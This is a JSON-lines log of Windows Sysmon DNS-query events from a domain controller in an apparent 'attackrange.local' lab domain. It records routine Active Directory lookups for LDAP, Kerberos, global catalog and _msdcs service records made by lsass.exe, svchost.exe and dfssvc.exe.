{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2597,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.673\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-6178966.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.673","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"attackrange.local.","QueryStatus":"0","QueryResults":"type:  2 win-dc-6178966.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2598,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.676\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.676","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2599,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.679\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001050C20200}\r\nProcessId: 2352\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dfssvc.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.679","ProcessGuid":"{41C8662E-1F73-5F25-0000-001050C20200}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dfssvc.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2600,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.679\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.679","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2601,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.686\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.pdc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.686","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.pdc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2602,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.687\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-6178966.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.687","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  2 win-dc-6178966.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2603,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.687\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.687","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2604,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.690\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.gc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.690","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.gc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2605,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.691\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nProcessId: 1312\r\nQueryName: us-east-2.compute.internal\r\nQueryStatus: 9501\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.691","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","QueryName":"us-east-2.compute.internal","QueryStatus":"9501","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2606,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.691\r\nProcessGuid: {41C8662E-1F63-5F25-0000-0010C2C20000}\r\nProcessId: 1220\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.691","ProcessGuid":"{41C8662E-1F63-5F25-0000-0010C2C20000}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2607,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.692\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.692","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2608,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.697\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.ac1b7fb6-7367-47ee-8baf-93da4715dbae.domains._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.697","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.ac1b7fb6-7367-47ee-8baf-93da4715dbae.domains._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2609,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.700\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: gc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.700","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"gc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2610,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.703\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: 9961af32-1d84-49d4-acb4-dd3d3b60478b._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  5 win-dc-6178966.attackrange.local;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.703","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"9961af32-1d84-49d4-acb4-dd3d3b60478b._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  5 win-dc-6178966.attackrange.local;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2611,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.707\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.707","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_kerberos._tcp.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2612,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.710\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.710","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2613,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.714\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.714","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2614,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.717\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.717","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2615,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.721\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.721","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_kerberos._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2616,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.725\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.725","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2617,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.728\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: _gc._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.728","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"_gc._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
